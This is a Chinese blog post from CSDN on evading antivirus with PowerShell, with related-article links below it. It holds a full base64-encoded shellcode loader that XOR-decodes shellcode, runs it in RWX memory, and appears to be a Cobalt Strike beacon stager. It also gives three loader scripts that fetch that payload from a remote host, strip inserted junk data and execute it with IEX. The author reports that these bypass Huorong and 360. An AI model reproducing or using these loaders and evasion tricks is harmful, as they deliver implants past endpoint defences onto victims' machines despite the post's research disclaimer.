免杀 | powershell免杀的几种简单方式

最新推荐文章于 2024-05-14 20:08:25 发布
最新推荐文章于 2024-05-14 20:08:25 发布
阅读量438 收藏 10
点赞数 11
文章标签: linux 运维 服务器 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_66717977/article/details/136694594
版权

更多更好的内容请关注微信公众号“猎洞时刻”!!!

免责声明:本文只做技术研究,如果有人利用此技术进行黑客攻击行为,一切后果由自己承担!!!

拒绝做非法渗透!!!!!!

生成powershell文件

图片

图片

下面是ps1文件内容,绿色部分,就是我们要进行分离的代码。

图片

最简单的base64分离免杀

将下刚才圈起来的代码复制下来,直接进行base64编码

图片

编码后变成下面这样

ZnVuY3Rpb24gZnVuY19nZXRfcHJvY19hZGRyZXNzIHsKCVBhcmFtICgkdmFyX21vZHVsZSwgJHZhcl9wcm9jZWR1cmUpCQkKCSR2YXJfdW5zYWZlX25hdGl2ZV9tZXRob2RzID0gKFtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKSB8IFdoZXJlLU9iamVjdCB7ICRfLkdsb2JhbEFzc2VtYmx5Q2FjaGUgLUFuZCAkXy5Mb2NhdGlvbi5TcGxpdCgnXFwnKVstMV0uRXF1YWxzKCdTeXN0ZW0uZGxsJykgfSkuR2V0VHlwZSgnTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMnKQoJJHZhcl9ncGEgPSAkdmFyX3Vuc2FmZV9uYXRpdmVfbWV0aG9kcy5HZXRNZXRob2QoJ0dldFByb2NBZGRyZXNzJywgW1R5cGVbXV0gQCgnU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZicsICdzdHJpbmcnKSkKCXJldHVybiAkdmFyX2dwYS5JbnZva2UoJG51bGwsIEAoW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWZdKE5ldy1PYmplY3QgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZigoTmV3LU9iamVjdCBJbnRQdHIpLCAoJHZhcl91bnNhZmVfbmF0aXZlX21ldGhvZHMuR2V0TWV0aG9kKCdHZXRNb2R1bGVIYW5kbGUnKSkuSW52b2tlKCRudWxsLCBAKCR2YXJfbW9kdWxlKSkpKSwgJHZhcl9wcm9jZWR1cmUpKQp9CgpmdW5jdGlvbiBmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIHsKCVBhcmFtICgKCQlbUGFyYW1ldGVyKFBvc2l0aW9uID0gMCwgTWFuZGF0b3J5ID0gJFRydWUpXSBbVHlwZVtdXSAkdmFyX3BhcmFtZXRlcnMsCgkJW1BhcmFtZXRlcihQb3NpdGlvbiA9IDEpXSBbVHlwZV0gJHZhcl9yZXR1cm5fdHlwZSA9IFtWb2lkXQoJKQoKCSR2YXJfdHlwZV9idWlsZGVyID0gW0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgnUmVmbGVjdGVkRGVsZWdhdGUnKSksIFtTeXN0ZW0uUmVmbGVjdGlvbi5FbWl0LkFzc2VtYmx5QnVpbGRlckFjY2Vzc106OlJ1bikuRGVmaW5lRHluYW1pY01vZHVsZSgnSW5NZW1vcnlNb2R1bGUnLCAkZmFsc2UpLkRlZmluZVR5cGUoJ015RGVsZWdhdGVUeXBlJywgJ0NsYXNzLCBQdWJsaWMsIFNlYWxlZCwgQW5zaUNsYXNzLCBBdXRvQ2xhc3MnLCBbU3lzdGVtLk11bHRpY2FzdERlbGVnYXRlXSkKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZUNvbnN0cnVjdG9yKCdSVFNwZWNpYWxOYW1lLCBIaWRlQnlTaWcsIFB1YmxpYycsIFtTeXN0ZW0uUmVmbGVjdGlvbi5DYWxsaW5nQ29udmVudGlvbnNdOjpTdGFuZGFyZCwgJHZhcl9wYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZU1ldGhvZCgnSW52b2tlJywgJ1B1YmxpYywgSGlkZUJ5U2lnLCBOZXdTbG90LCBWaXJ0dWFsJywgJHZhcl9yZXR1cm5fdHlwZSwgJHZhcl9wYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKCglyZXR1cm4gJHZhcl90eXBlX2J1aWxkZXIuQ3JlYXRlVHlwZSgpCn0KCltCeXRlW11dJHZhcl9jb2RlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMzh1cUl5TWpRNnJHRXZGSHFIRVRxSEV2cUhFM3FGRUxMSlJwQlJMY0V1T1BIMEpmSVE4RDR1d3VJdVRCMDNGMHFIRXpxR0VmSXZPb1kxdW00MWRwSXZOenFHczdxSHNESXZEQUgycW9GNmdpOVJMY0V1T1A0dXd1SXVRYncxYlhJRjdiR0Y0SFZzRjdxSHNISXZCRnFDOW9xSHMvSXZDb0o2Z2k4NnBuQndkNGVFSjZlWExjdzN0OGVhZ3h5S1YrUzAxR1Z5TkxWRXBOU25kTGIxUUZKTnoyRXR4MGRIUjBkRXNaZFZxRTNQYktweU1qSTNnUzZuSnlTU0J5Y2tzZytpTWpjSE5MZEtxODVkejJ5Rk40RXZGeFN5TWhZNmR4Y1hGd2NYTkx5SFlOR056MnF1V2c0SE1TM0hSMFNkeHdkVXNPSlR0WTNQYW00eXluNENJakl4TGNwdFZYSjZyYXlDcExpZWJCZnR6MnF1SkxaZ0o5RXR6MkV0eDBTU1J5ZFhOTGxIVERLTnoybkNNTUl5TWE1RmVVRXR6S3NpSWpJOHJxSWlNank2amMzTndNYzJwUGRDTk12R1JTREsvdzVzdXlqREtZbFFFbzV0Y2hCczIxSVVNRWVQcGludXFMaDBQVmRWR1NVSmMrb0E2SUl3cnZDZDZsZUs4Tk1zQUdMM1JVVlB5dEVJZEFSUlQ1SVhLZG85ZTRJM1pRUmxFT1lrUkdUVmNaQTI1TVdVcFBUMElNRmcwVEF3dEFURTVUUWxkS1FVOUdHQU51Y0dwbUF4b05FeGdEZEVwTlIweFVVQU50ZHdNVkRSSVlBM1JLVFJVWEdBTmJGUmNZQTNkUlNrZEdUVmNNRmcwVEdBTnVZbTlnQ2k0cEl4ems4eVFLcWpXdmxQcTBVQTUwY3NiR3pBZDNyakRRWE9MV04rbUIwUHA0dklzcWpiMnlKZy80by9USkh2OEZiajJuQ0VxdEViNGIwZGFXamw4VnFMZERRdDNmU2tOeE9MY050blNSWEM2T0h5TDY1NlQ4MXFROFI1UVQ0SWJuMGtVUmNoYWV1TGR4K1AyOHlKRVRJaUw3cWZ2c3hCMEhmbFlrOThDNytQbHh1L2E4bDZqQWtzcHJjdmw2UnZVNldIcCt3K3BLbUNRTGpLN3lLT1FTMjBYbDMvczdwUWp5TERVUlE3RndVVUwwRmszU2hCZW1XQVlTTExja3FvUjJpZVZFeklIUGdTbllSWk8vRTdhNFdTTkwwNWFCZGR6MlNXTkxJek1qSTBzakkyTWpkRXQ3aDNERzNQYXdtaU1qSXlNaStuSndxc1IwU3lNREl5TndkVXN4dGFyQjNQYW00MWZscUNRaTRLYmpWc1o3NE11SzN0emNFaG9SRFJJVkd3MGFFUTBTRVJzakdmMUxrZz09JykKCmZvciAoJHggPSAwOyAkeCAtbHQgJHZhcl9jb2RlLkNvdW50OyAkeCsrKSB7CgkkdmFyX2NvZGVbJHhdID0gJHZhcl9jb2RlWyR4XSAtYnhvciAzNQp9CgokdmFyX3ZhID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6R2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIoKGZ1bmNfZ2V0X3Byb2NfYWRkcmVzcyBrZXJuZWwzMi5kbGwgVmlydHVhbEFsbG9jKSwgKGZ1bmNfZ2V0X2RlbGVnYXRlX3R5cGUgQChbSW50UHRyXSwgW1VJbnQzMl0sIFtVSW50MzJdLCBbVUludDMyXSkgKFtJbnRQdHJdKSkpCiR2YXJfYnVmZmVyID0gJHZhcl92YS5JbnZva2UoW0ludFB0cl06Olplcm8sICR2YXJfY29kZS5MZW5ndGgsIDB4MzAwMCwgMHg0MCkKW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6Q29weSgkdmFyX2NvZGUsIDAsICR2YXJfYnVmZmVyLCAkdmFyX2NvZGUubGVuZ3RoKQoKJHZhcl9ydW5tZSA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyKCR2YXJfYnVmZmVyLCAoZnVuY19nZXRfZGVsZWdhdGVfdHlwZSBAKFtJbnRQdHJdKSAoW1ZvaWRdKSkpCiR2YXJfcnVubWUuSW52b2tlKFtJbnRQdHJdOjpaZXJvKQ==

然后将这一串base64编码的内容,放到一个web目录下,我放在这个pw1.txt文件,可以看到预览内容全部都是base64编码。

图片

然后再将原本的powershell文件进行改造,框住的代码全部删除,改成远程加载,然后再对加载的base64编码进行解码即可。代码如下。最后文件命名为basex86-4.ps1

Set-StrictMode -Version 2
$DoIt=((New-Object System.Net.Webclient).DownloadString('http://192.168.92.1/powershell/pw1.txt'))
$basetest=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))

If ([IntPtr]::size -eq 8) {  start-job { param($a) IEX $a } -RunAs32 -Argument $basetest | wait-job | Receive-Job}else {  IEX $basetest}

图片

这个是这几个中最基础也是最简单的,但是免杀效果反而是比较好的,搞的越复杂,那个某绒,某60反而直接给你杀了。

图片

图片

运行basex86-4.ps1,可以成功上线,并且长时间过去也没有查杀。

图片

base64编码上面添加脏数据

这个是在远程加载的base64代码上面随意添加脏数据,然后在解码直接就把脏数据给替换掉,然后再解码,比上面的就多了一个添加脏数据的过程。

在需要分离加载的web目录下创建文件pw2.txt,然后再将上面的那个base64代码直接拷贝上去,然后再在代码里面插入脏数据。

图片

添加后,就需要在原本的ps1文件内进行替换掉这些脏数据,再进行解密。代码如下。

Set-StrictMode -Version 2
$DoIt=((New-Object System.Net.Webclient).DownloadString('http://192.168.92.1/powershell/pw2.txt'))
$DoIt=$DoIt.Replace('A1xxNy','')
$basetest=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))

If ([IntPtr]::size -eq 8) {  start-job { param($a) IEX $a } -RunAs32 -Argument $basetest | wait-job | Receive-Job}else {  IEX $basetest}

可以正常运行。

图片

这样做反而受到了某绒的关注,gg

图片

但是360没有扫描出来

在源代码插入脏数据

这个和上一步不一样,这个是直接在原本的代码插入脏数据,再base64编码放置在web目录下,进行远程加载的时候,先进行解码,再替换掉脏数据,随后再运行。

直接在代码插入脏数据,然后进行base64加密。

加密后代码如下,放到web目录下。

总共代码如下​​​​​​​

Set-StrictMode -Version
$DoIt=((New-Object System.Net.Webclient).DownloadString('http://192.168.92.1/powershell/pw3.txt'))

$basetest=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))$basetest=$basetest.Replace('A1xxNy','')

If ([IntPtr]::size -eq 8) {  start-job { param($a) IEX $a } -RunAs32 -Argument $basetest | wait-job | Receive-Job}else {  IEX $basetest}

先进行解密,再替换掉脏数据。

虽然说,有些许报错,但是不影响运行。

图片

这个依旧收到了某绒的关注,但是360暂时没有查杀出来。

图片

图片

最终使用第一种方式可以成功过某绒,某绒没有任何反应,反而第二种,第三种的带脏数据的受到了某绒的关注。这三种,在某60是一开始可以绕过检测并上线,但是过一会还是可能会被查杀。这些只是简单的免杀,仅仅这些还是不足够的,还需更多其他的免杀姿势。

更多更好的内容请关注微信公众号“猎洞时刻”!!!

CengLnH
关注
  • 11
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Cobalt_Strike_beacon免杀上线Powershell1
08-03
第一步,创建监听器,并用对应的监听器生成的 "Powershell payload " 第二步,回到本地机器上,先准备好一张大点的图片,比如随便去找一张"192
CS-Loader:CS免杀
03-22
V1.5:加入C版本CS免杀(已完成) V1.7:加入Powershell免杀(已完成) V2.0:开发出UI界面V2.0:开发成在线免杀平台(已完成) PS:在实际使用中发现图形化界面不利于和其他工具结合,引用之下命令行的方式更...
CS木马免杀技巧分享.pdf
08-11
01Shellcode加载器 02 Powershell免杀 03 利用场景介绍
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 454
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
网络安全最全powershell基础免杀(一)_power进阶免杀(1),2024火爆全网系列
最新发布
2401_84264010的博客
05-14 345
powershell是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能,PowerShell脚本的文本文件,其文件名需要加上扩展名“.PS1”。PowerShell需要.NET环境的支持,同时支持.NET对象,其可读性、易用性居所有Shell之首。1、在Windows 7以上的操作系统中是默认安装的。2、PowerShell脚本可以运行在内存中,不需要写入磁盘。3、几乎不会触发杀毒软件。4、可以远程执行。
Powershell免杀
mingyqf的博客
05-11 2371
Powershell免杀 本文作者:Chenw 本文链接:https://www.cnblogs.com/chen-w/p/14726549.html 0x01 前言 前几天搞一个站的时候,进入内网,想让内网一台机子powershell上线。然后被杀软拦截了,极其的不讲武德,想着找我极强的朋友们白嫖个免杀的方法。 后面还是没有白嫖到,只好自己去研究学习一下了(针对CS的进行免杀,后面思想大同小异)于是做了这个小笔记。 0x02 Powershell免杀思路 先介绍一下powershell木马最常用的方式
免杀对抗-PowerShell-混淆+分离
xiaoheizi的博客
09-15 662
解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆的反而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。
红队攻防之powershell上线基础免杀(一)
自强不息
02-25 536
不努力,你背井离乡干嘛?当卧底啊
记一次PowerShell免杀实战
zhangge3663的博客
12-30 1661
最近在玩免杀,发现了一些免杀思路,今天来给大家做个分享,希望可以帮到大家。 0x01 powershell 加载 shellcode 介绍 UNIX 系统一直有着功能强大的壳程序(shell),Windows PowerShell的诞生就是要提供功能相当于UNIX系统的命令行壳程序(例如: sh、bash或csh),同时也内置脚本语言以及辅助脚本程序的工具,使命令行用户和脚本编写者可以利用.NET Framework的强大功能。 powershell具有在硬盘中易绕过,内存中难查杀的特点。一般在后渗透
利用powershell进行免杀
PortugalCR7的博客
06-29 194
利用Invoke Obfuscation进行混淆。查看powershell的版本号()
CS-Avoid-killing:CS免杀加载器
05-05
V1.5: 加入C版本CS免杀(已完成)V1.7:加入Powershell免杀(已完成)V2.0:开发出UI界面V2.0: 开发成在线免杀平台(已完成)PS: 在实际使用中发现图形化界面不利于和其他工具结合,相比之下命令行的方式更具有扩展性关于...
免费的SQL Server PowerShell脚本.pdf
09-19
免费的SQL Server PowerShell脚本.pdf
免杀powershell
zhangshuaiijie的博客
06-24 230
下载Invoke-Obfuscation:https://github.com/danielbohannon/Invoke-Obfuscation。进入Invoke-Obfuscation目录,在powershell中执行。我看了好几篇去年的文章还是能过的,不过现在火狐和360都不能过去。不过在virscan和VirusTotal上面报毒还是很少的。如果报错,在管理员权限下powershell执行。
PowerShell脚本免杀/bypass/绕过杀毒软件,ReconFTW 漏洞扫描
代码讲故事
09-16 469
PowerShell脚本免杀/bypass/绕过杀毒软件,ReconFTW 漏洞扫描。
我的powershell免杀之路
mingyqf的博客
05-17 1898
我的powershell免杀之路 ​ 原创 tubai
Powershell免杀系列(二)
st3pby的博客
02-20 3144
技术交流 关注微信公众号 Z20安全团队 , 回复 加群 ,拉你入群 一起讨论技术。 直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看。 正文 powershell免杀⽅法有很多,对代码进⾏编码是最常⻅的⼀种,这⾥介绍⼀个专⻔⽤来对powershell进⾏编码免杀的框架Invoke-Obfuscation,这也是著名的APT32组织海莲花常⽤的⼀个⼯具。 该工具可以对powershell代码进行 ASCII/hex/octal/binary/SecureS...
免杀对抗-Powershell-混淆无文件
m0_62172162的博客
04-25 773
免杀对抗-Powershell-混淆无文件
免杀-PowerShell
weixin_58782362的博客
11-20 731
win自带defender杀毒工具,所以defender和powershell用的同一种语言,很容易被查杀,所以我们尽量就不要用powershell。如果是powershell脚本,只要对方执行就能上线,如果是cmd,先输入powershell,然后payload.ps1。2、执行模式-直接执行命令(有上线代码),最好别在powershell终端执行,容易出错。1、直接在base64编码上添加,然后将垃圾数据替换为空,最后进行解码。混淆、手工混淆,将内容进行base64编码,然后进行解码。
cmd | powershell
03-08
cmd和PowerShell都是Windows操作系统中的命令行工具,用于执行各种系统管理和操作任务。它们提供了一种通过命令行界面与计算机进行交互的方式。 1. cmd(Command Prompt)是Windows操作系统中的默认命令行工具。它提供了一系列的命令和脚本语言,可以用于执行文件操作、系统管理、网络配置等任务。cmd使用批处理文件(.bat)来批量执行一系列命令。 2. PowerShell是一种更强大和灵活的命令行工具,它基于.NET框架,并且支持脚本语言。PowerShell提供了丰富的命令和功能,可以用于系统管理、自动化任务、脚本编写等。PowerShell使用脚本文件(.ps1)来批量执行一系列命令。 相比于cmd,PowerShell具有更多的功能和扩展性。它支持强大的脚本语言、对象管道、远程管理等特性,使得系统管理和自动化任务更加方便和高效。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值